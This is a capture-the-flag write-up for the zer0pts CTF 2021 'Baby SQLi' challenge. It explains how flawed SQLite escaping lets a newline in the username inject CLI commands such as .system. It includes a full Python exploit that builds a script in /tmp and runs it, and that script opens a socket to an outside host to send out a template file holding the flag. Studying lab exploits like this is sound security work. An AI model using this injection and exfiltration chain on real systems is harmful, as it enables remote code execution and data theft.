Try   HackMD

Baby SQLi - zer0pts CTF 2021

tags: zer0pts CTF 2021 web

Overview

  • The flag is in templates/index.html as below. To obtain the flag, you need to be logged in as admin, or read the content of the template file.



        {% if name == 'admin' %}
        <p>zer0pts{*****CENSORED*****}</p>
        {% else %}
  • User input will be embedded in SQL statement, however, SQL Injection in /login seems to be prevented by escaping it.


def sqlite3_escape(s):
    return re.sub(r'([^_\.\sa-zA-Z0-9])', r'\\\1', s)


















@app.route('/login', methods=['post'])
def auth():
    username = flask.request.form.get('username', default='', type=str)
    password = flask.request.form.get('password', default='', type=str)
    if len(username) > 32 or len(password) > 32:
        flask.session['msg'] = 'Too long username or password'
        return flask.redirect(flask.url_for('home'))

    password_hash = hashlib.sha256(password.encode()).hexdigest()
    result = None
    try:
        result = sqlite3_query(
            'SELECT * FROM users WHERE username="{}" AND password="{}";'
            .format(sqlite3_escape(username), password_hash)
        )
    except:
        pass
  • Communicating with SQLite3 database is implemented with subprocess.Popen even though Python supports sqlite3 module.













def sqlite3_query(sql):
    p = subprocess.Popen(['sqlite3', 'database.db'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    o, e = p.communicate(sql.encode())
    if e:
        raise Exception(e)
    result = []
    for row in o.decode().split('\n'):
        if row == '': break
        result.append(tuple(row.split('|')))
    return result

Solution

SQL Injection

sqlite3_escape escapes characters except for _.\sa-zA-Z0-9 by prepending backslashes. However, in SQLite3, you need to escape ' and " in a string literal by putting the same character twice instead of prepending backslashes.

$ sqlite3
SQLite version 3.27.2 2019-02-25 16:06:06
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> SELECT "\";
\
sqlite> SELECT "a""b";
a"b

Because of this behavior, when you input " as username in /login, it breaks SQL structure.

SQLite3 commands

By breaking SQL structure, you can insert some characters after ". It is important that you can also use LF (U+000A) because in CLI version of SQLite3, by combinating " and ;, you can end SQL statement and then execute next query or SQLite3 commands. For example, if you input ";\n.tables\n as username, you can execute .tables command as below.

sqlite> SELECT * FROM users WHERE username="\"\;
Error: unrecognized token: "\"
sqlite> .tables
users

However, as you can see in the code as below, if there is any output to stderr, you cannot retrieve the output to stdout.














def sqlite3_query(sql):
    p = subprocess.Popen(['sqlite3', 'database.db'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    o, e = p.communicate(sql.encode())
    if e:
        raise Exception(e)
    result = []
    for row in o.decode().split('\n'):
        if row == '': break
        result.append(tuple(row.split('|')))
    return result

Let's find some useful commands to bypass this restriction. Looking through .help command, you can find .shell command, which can be used to execute OS commands.

sqlite> .help
...
.session ?NAME? CMD ...  Create or control sessions
.sha3sum ...             Compute a SHA3 hash of database content
.shell CMD ARGS...       Run CMD ARGS... in a system shell
.show                    Show the current values for various settings
.stats ?on|off?          Show stats or turn stats on or off
...

Although there is a limit on the length of username, you can bypass it by writing payload to somewhere under /tmp character by character and executing the script as below.

import requests

HOST = 'localhost'
PORT = 8004

script = "import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('moxxie.tk',18001));s.send(open('/home/app/templates/index.html','rb').read())"

def run(cmd):
    payload = {
        'username': '";\n.system {}\n'.format(cmd),
        'password': 'legoshi'
    }
    r = requests.post(f'http://{HOST}:{PORT}/login', data=payload)

run('printf "">/tmp/hal')
for c in script:
    run('printf "{}">>/tmp/hal'.format(c))
run("python /tmp/hal")

zer0pts{w0w_d1d_u_cr4ck_SHA256_0f_my_p4$$w0rd?}
Last changed by 
st98
https://st98.github.io https://twitter.com/st98_
0
3637

Read more

GuestFS:AFR - zer0pts CTF 2021

Overview This is a service that you can create, read, and delete files including symbolic links. Filename should not contain characters except for 0-9A-Za-z. When you create a symbolic link, the link target should not start with / or contain ... Solution Paths of link targets will be only checked when files are created. Looking through the source code, you will notice that the order of checking a target path is, calling symlink, then checking the target path with readlink. Why does it checks the target path after a symbolic link is created? /* Create a symbolic link */

Mar 7, 2021
Kantan Calc - zer0pts CTF 2021

Overview User input and the flag will be inserted into &apos;use strict&apos;; (function () { return ${code}; /* ${FLAG} */ })(), and the server executes the code in sandbox. const result = vm.runInNewContext(`&apos;use strict&apos;; (function () { return ${code}; /* ${FLAG} */ })()`, {}, { timeout: 100 }); As you can see in the code, the flag is inserted as a comment in a function, after user input. So, what you need to do is somehow exfiltrating the comment by, for example, converting the function to String and outputting it. Since the server sets the maximum length of user input to 29 characters, you need to do code-golf with some features available in recent ECMAScript. const code = req.query.code + &apos;&apos;;

Mar 6, 2021
Simple Blog - zer0pts CTF 2021

Overview This application fetches api.php and renders the contents by JSONP. The length of the name of a callback function is up to 20 characters. &lt;?php header(&apos;Content-Type: application/javascript&apos;); $callback = $_GET[&apos;callback&apos;] ?? &apos;render&apos;; if (strlen($callback) &gt; 20) { die(&apos;throw new Error(&quot;callback name is too long&quot;)&apos;); }

Mar 6, 2021
[zer0pts CTF 2020] MusicBlog

Solution We&apos;re given source codes for database, app, and crawler. The location of flag can easily be found in worker/worker.js. // (snipped) const flag = &apos;zer0pts{&lt;censored&gt;}&apos;; // (snipped) const crawl = async (url) =&gt; {

Mar 8, 2020
Read more from st98
Published on HackMD